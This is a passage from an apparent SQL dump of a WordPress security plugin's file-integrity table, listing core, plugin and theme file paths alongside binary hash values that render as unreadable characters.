b9�a�#s+W','wp-content/plugins/wordpress-seo/admin/class-admin-asset-seo-location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zy���P��902�','\r�w�Y��;O\'�l/7G�K�F�������','',0,'?'),('���yKv��.�\Z�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��_�3��Nw�#�','�ǥ��mZz*,=:\n��-�3��|��!���','',0,'?'),('�ݙ�P(���O\'E��e','wp-includes/js/jquery/ui/effect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eu��(��췺:	O','��\Z��]�+��Z��W�k��府���','',0,'?'),('�ݚ�y.\0�؜�i�','wp-content/plugins/wordpress-seo/admin/class-admin-user-profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fwOm`-|\"e�1�I@�','[^��BA�\r�c��D��7�\n��q���DO��8','',0,'?'),('�鋭��{^�MU*�_','wp-includes/js/twemoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B���f�\Z���+���D','\"�/�D���|�fh�3嚅�+F�P�Gl4M+�','',0,'?'),('�<˷�u����Q���','wp-content/plugins/wordpress-seo/js/dist/used-keywords-assessment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\n���K={�','w����(�%e\"�m՝U��׎�\ny~ɠVd','',0,'?'),('��\\T��@SO�|m','wp-includes/blocks/audio/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ռ�!I���c��p�D','}H���9�\"���XG�<���hK��~��:QO�Ҩ','',0,'?'),('�@��AO=	�yA�','wp-includes/class-wp-paused-extensions-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!n�������s�|','����B*��v��y\0w�L_����Y\n���','',0,'?'),('��]mٲ�	▭�','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w�̩	��&J����)','���M��,�P:�k�\nN�2�[s\nWze]oN','',0,'?'),('����gs��)݅','wp-includes/blocks/latest-posts/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�)鐰�H��nW� �','YK@���XxT��g�&K�{#-�r��s�x}�','',0,'?'),('�%#��t���4�x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�W�0{X�n�Z�0','�\0AV�RX��ȕ�~��d�^�/)�@R��','',0,'?'),('�.����Y�D\\Tr���','wp-content/plugins/wp-smushit/core/integrations/class-s3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��sR��;)•	�','�M�6�?�T�u+I��I`c���Y֒M�','',0,'?'),('�3|>[�\n`��xѹ�u','wp-includes/wp-includes/js/jquery/ui/selectmenu.min.js',0,'p��Wj*m��Es�','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('�>6bY���AUF�.','wp-includes/blocks/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�jX���.��p}�','g�<����k!	}H�)[��� ��H؅�','',0,'?'),('�>�s�l�WD7�M�','wp-includes/bookmark-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˩TL$e)�$���op','��\0x�A�5\'JL��c�q�1��xw�!C�JDY','',0,'?'),('�PTDg{�YߎC[��J','wp-content/plugins/wp-cerber/assets/flags/md.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�쮤��CN6s��m','s�jJ�9�y�q(��Ծ����/��ٙi�h`�','',0,'?'),('�^��%\\��7�z���','wp-content/themes/hitmag/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3l5��m�2�[��E7�','\0�T_�5�U!�,s��1mA��$h�iʊ�X&�','',0,'?'),('�ac��I}�f�Ȅ�;','wp-content/plugins/wordpress-seo/admin/views/tool-bulk-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"+��ݔ)W2�','�Dn��	N��q��C���7��s)ew��{��B�','',0,'?'),('�gz_�Mvf��~�','wp-includes/css/dist/block-library/classic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����o��� �c2:O','� s�T#�ʿ��M�9pڊ�fEe+� �M6','',0,'?'),('�hV�,�mT��H�Y�8','wp-content/plugins/wp-cerber/assets/flags/ag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��E���[��n-��M','�6d�����=N>��]�����,!�˩M','',0,'?'),('�p�N�[���<��tc{�','wp-content/plugins/wp-smushit/_src/react/views/webp/step-content.jsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���������@���~','q���v8����ҟ��ޅ3��λ�)�\0�j�RE<','',0,'?'),('�wa� _�zJ;D�W��','wp-includes/wp-includes/js/wp-pointer.min.js',0,'\"�%��iهkm���','\"�%��iهkm���','U�Xu��LJ�)G,i��m����5�_��MT_','',0,'?'),('А�DF��޻G�h��R','wp-content/plugins/wp-fastest-cache/images/button-back-fire.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)�Lr�G�+�j�','D�<V�B��\0i�,BUyv]�j�RG�ەE��{','',0,'?'),('Е\rH��´7��','wp-content/plugins/redirection/locale/redirection-en_ZA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k^dα&6�Z��','	��\\4�~��>	�>��䀏Ir�x���o��{','',0,'?'),('Т�펹�|����@','wp-includes/images/smilies/icon_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 	�J<�g��o�9:x','�n�c���x0�ĥ���t��N���޾Y2X\0!','',0,'?'),('Ю��v�WLѤ��','wp-content/plugins/wordpress-seo/images/readability-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i���Fh0��B��}�','�W��\n�߁��왹����7�`r��{IN�F','',0,'?'),('к~1���O1κ)��','wp-content/plugins/wordfence/css/wf-font-awesome.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��M��ً�V���:','997dI�Ou�-����%enԻ�1�����I','',0,'?'),('����/�EmS��~�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-taxonomy-sitemap-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��⟒�`��{-[,R','�l��Y8P��K:�wl�,#m��G^��w��Raf','',0,'?'),('��C�>��\nZ:J����','wp-content/plugins/wp-cerber/assets/flags/ar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_WX�E�l�_�g*�','.��]�ܥ�יIJD�/������6�-\n�a)�','',0,'?'),('�ŷF�֒d�D\'�\Z���','wp-includes/wp-includes/images/xit.gif',0,'��	3X�ī9+�6n~','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('�����.p]����Z','wp-content/plugins/wordpress-seo/src/integrations/third-party/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H��LM���]j8��','[lj=��B[\n\"���uB�u[Ud�R>�eΫ','',0,'?'),('��u|�=:�1���v�','wp-includes/blocks/post-excerpt/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qj�)O=S�R��','oC�l\'�6IJ�j���2�\'\Z�l\'�\n��}{','',0,'?'),('��/��?����U��','wp-includes/Requests/Utility/FilteredIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#���6B�o��f�u','�AS\Z3H	��Q9ͳo�@h_��!1S/��x','',0,'?'),('��2[�v\\)�I���Q','wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/��\\�/0oҹ	ע�\\','����g�Z��xEĴ�ΗM&3r�q�c�lTG�','',0,'?'),('��^�\\�X�PvS�\\�{','wp-admin/js/media-upload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�߻V?��a�n\r��','�E������a,�\Z��,yM�/\\iQ�Ӡ\"�?28','',0,'?'),('�ؐ�+!�5�o&���','wp-includes/wp-includes/js/wplink.min.js',0,'��`��̶�Vu��m��','��`��̶�Vu��m��','Ե*&n�����_��f\nz\r*���3I�I;C›�','',0,'?'),('���`�~P�0N�6H','wp-content/plugins/wordpress-seo/inc/class-wpseo-shortlinker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0v�Eѿ;q&�1�o��','E�BED���\0V6>7ɥLVQ�O%g��','',0,'?'),('��45�n���U�S�w','wp-includes/wp-includes/script-loader.php',0,',:q���Hn<4���@',',:q���Hn<4���@','���جK��\'��\r<S��K�\"����6i+��9','',0,'?'),('�����,���f��','wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y2eR���ۻ�I��','Rws�5Ǩ6����Т�Kx�i,�u|��','',0,'?'),('�!Z�&kAyX���)','wp-includes/blocks/comments-pagination-numbers/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aOYc�*C)�����%�','�~�$;�V|��&8���mpț��h���>��','',0,'?'),('��EU���-ф�M��:','wp-includes/blocks/more/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r�<%g�gdϑ��','[|��.Nˡ����?O��];�#���5�ه�T','',0,'?'),('�&\00%�S��n\Z�‡e','wp-content/plugins/redirection/matches/http-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}5P$Lg.\"�[�~��','f�أ�,���e���?�̑K���l�9','',0,'?'),('�&Zs\"�i�r�\r�g�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/zh-CN.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��85{ᤓ�B�թ�','*�Ͼ+�F�\\=�����*Q%}�u��˭4','',0,'?'),('�:�\n��y�ˌ\"4�','wp-includes/blocks/text-columns/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w��`}�N�\n��X','�t!��l�`�|*�^���0�	�l$C���;��','',0,'?'),('�?zW>����bwx','wp-content/plugins/redirection/locale/redirection-en_AU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����lT��˘X��','Md\'�����m�a�y�J� v\r�Z֠��Ui6�','',0,'?'),('�W	N����:��p���','wp-content/plugins/wordpress-seo/css/dist/schema-blocks-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�.��R�9����s9','z5��T\'�\'&\0�p�b�@��\Z$4ą�/+�x','',0,'?'),('�_\\c9mL�v��1��','wp-includes/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǻ[�AG�tJ�ƽ5','9��+	�e����%�/d!��!|J-�e/��/y�','',0,'?'),('�ma�vMv�K�\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n-ɞ3Z��2���>�','z��\r�i�\'\\\r�jL���㤑�4!�U��','',0,'?'),('�q�=s��-��','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-twitter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_y5o6�����','/+�\'I܆�f�E��\0�.\ne�%��~n��','',0,'?'),('�uRl�t����\"��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7֊i[L�9ƁH	�','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('���SWb�}q��t%|','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-ingredients.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T_�kr��`��z�7�','[�O�Z�\'��y����3��A{��L\r���q,','',0,'?'),('с���°)���&�T�','wp-content/plugins/wordpress-seo/admin/views/paper-collapsible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f��‘��R��A&',',e�,\r$l��!!f�v��Gx�\0��\0$�.<�','',0,'?'),('ф���X��r\nf��tk','wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.js',0,'+�n���1����oVb','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('ѱ_�Gup��','wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',0,'[cl�r�u�	�Сu^','[cl�r�u�	�Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('Ѷ�\"<9޺�ZXm�Ǖ','wp-includes/class-wp-theme-json-schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�����x��c��X','l��9��6e�x��H�c�ݕ���޹&v�','',0,'?'),('��6������\\�ƅ+@','wp-content/plugins/wordpress-seo/src/actions/configuration/configuration-workout-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�h����\"?|�y$','m�.���b�*F�:\0p{M𡨴�bؠ<��I','',0,'?'),('��H�=�LS�Y9x+�M�','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�qp1�wvZ��','.����p\Z������ ��&��\0x�ο','',0,'?'),('��}\0D��\nx_�)ؙ�','wp-includes/wp-includes/post.php',0,'{��Ԑ��[\"`}B','{��Ԑ��[\"`}B','�)���v��\"�G��\"�YV<�Q�X :��','',0,'?'),('��D�C0eW�����9','wp-content/plugins/wordpress-seo/css/dist/alerts-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����$��U��	v','��c}VW)��>5���J�~`�����q4�','',0,'?'),('���_�V#��Bt','wp-content/wflogs/config-transient.php',0,'� ��Cv�h5�WS�[�','� ��Cv�h5�WS�[�','P��ܓ�8!~��n�i I(J	?�\"UFb��','',1048576,'?'),('��N� :*D1��Uc','wp-content/plugins/wp-fastest-cache/inc/column.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Đ�L|b	,l`1�','m*�?U���wd�W�\r���;W%�m���|�','',0,'?'),('�)��\rW��蹣�<O�','wp-content/plugins/wordpress-seo/src/generators/breadcrumbs-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nI��ԓ�kW!B��uv','7�7ɩs��A{��� �w��uh��]�,���?','',0,'?'),('�Jh|��0�`Zp�E','wp-admin/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Y��i6s�uyq','��	��O��{Oc-��[�	\"e�g7~�%�wH','',0,'?'),('����$��L����[','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-color-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rƑ�<�X�Z-ΰ$�','˻����ґ]b߮X<F�,��n�k8\'�����','',0,'?'),('�m��I�`��\n@�v','wp-includes/wp-includes/css/buttons.min.css',0,'a��n��G��f�g���','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('�\0�9i6��x�����','wp-content/plugins/wordpress-seo/src/actions/indexing/abstract-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i\'����?��:���','\r����#����xU�P7�.ӍxIoQt�\n','',0,'?'),('��Y:��R���|�n�J','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/GuardedPropertyTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V*K�S*��^��(}�','�$.����A��^j\n3n���^_L�S','',0,'?'),('�%+D���D��Š ��\r','wp-content/plugins/wordpress-seo/admin/class-admin-asset-yoast-components-l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WE�{g�u^0�}�','%���R�E�^ջk��������x!9�àP�5��	','',0,'?'),('�7�[*w�J\nn���>','wp-includes/js/dist/redux-routine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Β�zOv:�%','��&���bE6�<��A��t�O�h*k`��}qY','',0,'?'),('�8�s鎗��߹Oh�','wp-includes/js/dist/vendor/regenerator-runtime.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��5��.E/X�;E�~','\\�@�m~��cn�񏳕Y�>��UwG�d���e�','',0,'?'),('�MK�ă^w����8 ','wp-content/plugins/disable-gutenberg/js/settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x!}m��AL�\Z�V\'�','���	Tɛ!�g;{�H�GE�\r�p��O��he','',0,'?'),('�j�i�� �\nT�槿\r','wp-includes/blocks/post-featured-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8ٖx�Z	�ڹ��E��\0','���9VA�����`��j��X�\\�8\0�;C���','',0,'?'),('�q�Fa�z��n�#ؑl','wp-content/plugins/wp-cerber/assets/flags/lr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J8\r�+��魁X|��','���G�cw�\Z�U��2l��_٪�m�.�E>','',0,'?'),('Ҍ!�q�>������Y','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/ContainerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d-����8�0b��','9�o��!F��supA��_��\Zdac�]K�z1�','',0,'?'),('Ғ���vOP��\0�','wp-content/plugins/wp-smushit/app/views/dashboard/cdn/meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�`�q�Թ�xP瀞','��/x��/\Z�@þ������bJ�R�ߣ�p�','',0,'?'),('Җ6���M֦��5wH�','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k����ߟ*׉k+;8','7���M$<�rO9�Gj���Ey��Q*+�3','',0,'?'),('Ҟ���ǟ�	Ks���','wp-includes/images/icon-pointer-flag-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('ң�/I�u.�K`�/{','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/MimeType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�70����!��H�gk','�����*H+��:�\'^�n�N��i~��j\\U','',0,'?'),('Ҫ*���H���\n;t��','wp-admin/includes/ajax-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7(s����:��n�tv','A��T,�����/�7}��*��0�k��(\r��G','',0,'?'),('ҫ3\0�q��qFy�Y�U�','wp-content/plugins/wp-fastest-cache/js/lang/ukr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6����#{��$\\b','������+���{%�̈́jDk\\�r�L]�','',0,'?'),('ҭ�_VlK�g�!p�1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oҡu�/B�&?�h��','�Dٽ.�j7It�l�KD�pC���O���Уh�\n','',0,'?'),('ҲE5|�ѵ�C�d闼','wp-admin/options-reading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��uc4u��;�ޠ','���l�o��#�$��%Y��]kO��N)�','',0,'?'),('������ƶ��8AX@','wp-content/plugins/wp-cerber/admin/cerber-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a���2�9\r���Nf','-��O���(�$��KcWx-\r��0��#','',0,'?'),('��Lt593�u^���)��','wp-admin/images/comment-grey-bubble-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�TY�ŝ2�s,\r�m��','D��x���T-����w��N�	��P�{��','',0,'?'),('���q��~3�����','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Italic.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7r��/ܫL��V\\���','.�I�y�:P�]��!�~P�	׫:�p�5e�P','',0,'?'),('��l��I\r,�B8�','wp-includes/blocks/quote/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�~j�j	��\n��c','�+����Mn�x�o�ʜ^�p�Q�r�q�1','',0,'?'),('�w�]cI�w��Ȱ�H','wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ITw���������','l��a�#�YO�=7*w$S�rVа�����?h_\'','',0,'?'),('�\r{�`CJ��CKLG�','wp-content/plugins/wp-cerber/assets/flags/ba.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��s�#��/w��','�z��5\\i�LjZ����:��H��v\0�,�oq��','',0,'?'),('����:��!>��l�','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',0,'�ۓ���G�c,��=c^�','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�7(���R�1����R','wp-includes/wp-includes/js/dist/dom.js',0,'ϗL\'n��f\\��FFE','ϗL\'n��f\\��FFE','�[J`aq�ݭNc�;���eȜR��\Z�p.�','',0,'?'),('�8���Y(��?��','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^|ka\\�-���','��~����v�<&5��(�\raj�e�߷�P\r8�gl','',0,'?'),('�E#l��L��_&ܪ���','wp-admin/images/arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�$�>����>�Y','�YW��(��N3�2U;�����<.iDd!��','',0,'?'),('�H �%9���l�ԅ�E','wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z��|JS���','����i\\�JkF��t\\�\0x��Re�he�&j�','',0,'?'),('�Hej�l�E�9$�','wp-includes/wp-includes/user.php',0,'�λ���4S�����','�λ���4S�����',' BN+3Yj��}�Te�:�g\0t&�*�Į�i�','',0,'?'),('�Myt}Uc8���O�','wp-includes/wp-includes/js/plupload/handlers.js',0,'O��	�~�5��8�ͫ;�','O��	�~�5��8�ͫ;�','�	�\n�Z\rZ�B�[9��z��S)��4M%��','',0,'?'),('�M�p�\0���`k�nP','wp-includes/template-canvas.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�!�\'S�B|Ȍ�\Z','-tHv*��A1��@M���Mr\\z�H8�����','',0,'?'),('�U��n�/|r@ڪ��','wp-content/wflogs/config.php',0,'0����뷓цi�','0����뷓цi�','=�:�����\Z��V�Wۃ��x ^�c0��Su7�','',0,'?'),('�js��w2��p��qS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=hw\Z�{\"`Pl��','NU�2��|��2A���T�$��\r#%�:�','',0,'?'),('�s}�Ƕ�)�T�V��','wp-includes/blocks/nextpage/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������8��_]Y�','A�\'@i:G\r�t��-��C?��WG�9mKV','',0,'?'),('�{ڭd3T�Xy����7;','wp-includes/css/admin-bar-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a+�e������','��B鳒���j����x��EW��3�C/��A','',0,'?'),('�}��e��C��!�*','wp-includes/js/codemirror/codemirror.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�f��h�;f�q�','�u�*�Q�6�Ƅ�d�vdȇ�_���\0�����','',0,'?'),('Ӂ�K�|��pB��w�k','wp-includes/wp-includes/js/jquery/ui/effect-bounce.js',0,'�;B� ��GYQ�n�ߴ','�;B� ��GYQ�n�ߴ','���m/�g|ڶ\\���e(�>6��\n�-G!�\0','',0,'?'),('Ӎ�-w�y9�,���','wp-content/plugins/wordpress-seo/admin/class-premium-upsell-admin-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OCD}�ŞO�^����','$,�&}\\�N�	��t�����>yq�`oѿ��','',0,'?'),('ӕ����\n��t�0','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mpG���aB��NX>��(','%�-*Ψ6F��i�\rWϹ�M׽�WI���:�v�D','',0,'?'),('ӟ���my�+\nf�:','wp-includes/js/wp-api.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�_K�ŽA���UD�','���]�[�ɥ��`���,�r�����>�k��%��','',0,'?'),('Ӣ<i�9-^��@� �{�','wp-includes/wp-includes/js/admin-bar.min.js',0,'�၈��n�&�a1a\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('Ӥ����ǕL�F��ZQ','wp-includes/css/dist/block-library/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�|?�}���KX�6P','K��ì�Ѹ}�Ȥ|�i��D�B���߂�P�v','',0,'?'),('Ө]Z����l9�N\0','wp-content/plugins/redirection/database/schema/latest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�](,�6�2l2��','����	�B\0�h�@i��V��`SжY���&','',0,'?'),('Ӫ���!Ft	�%?l@]','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Bold.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wM�;�_m�ȁ','����NS��a4\\Mؘ�$Γ���H\0�����x�','',0,'?'),('ӭ����|����z`\\�','wp-includes/wp-includes/images/smilies/icon_evil.gif',0,'�^��M�>�z��','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('ӻ̸۬Z��a(�;��','wp-content/plugins/wordpress-seo/src/integrations/third-party/wincher-publish.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���.6����\\�$�F','>A� �b�ůq鸃��I�SUIUǖ.��}','',0,'?'),('�э�o(�H�ttx�.','wp-includes/blocks/table/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�f����h��3�1','n�֘p�!+ɒ����������n��s�- �:_','',0,'?'),('��5���ĺ�%��','wp-includes/blocks/buttons/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~VW�kh�q)��/�r','3�����=Tq�͗^A�\nR\Zj~�pKM��+Z�8','',0,'?'),('��.\"�)�U\rǸ=}]','wp-content/plugins/wordpress-seo/src/integrations/breadcrumbs-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�O=N9��LSW��','{G|\Z�(1/�,JbPǛ[�Rthe����xL�D','',0,'?'),('����G��I\Z�أ8�','wp-content/plugins/wordpress-seo/src/integrations/admin/workouts-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ojH�p��y}A�','T��|��:�$��|���v���.m�Bp;m','',0,'?'),('��H��AG�|����\"�','wp-includes/blocks/nextpage/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','쮥�@֦�`fx�W�','��\'���\Z[��	<A�����At��؏M�','',0,'?'),('��I7߇S�2�&���','wp-admin/erase-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H<�Б�?�Ǡ�G�','\\}}�i\0Gic���LH���W�tW����«i','',0,'?'),('�?H4�V�����\n��','wp-includes/blocks/pullquote/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�܃��]���<��j�','P>#i����P89i�J،�ֱ������X�y','',0,'?'),('����:/6�M�F~�1�','wp-content/plugins/wp-smushit/_src/js/smush/directory-scanner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�oƝ	7}��f�',',�3��P�D��Q�P\"j��/h�%[a$��O','',0,'?'),('�	kJ�?� �@x����','wp-includes/blocks/categories/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�,��6�3�O.��','͚i?�e�zΏ%��=�T��n��N\\Ƅ���','',0,'?'),('�\n}l�uxR�i�&��','wp-includes/wp-includes/js/dist/vendor/moment.min.js',0,'d\"��\"M��aM�w�M','d\"��\"M��aM�w�M','O��m��y���6ۆ�x`R0Nh[7\0]�%�ʞ','',0,'?'),('�����0*�W��','wp-content/plugins/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�O�p��/�u���','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/term-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','۲S������s�','��Iƴ�f֧	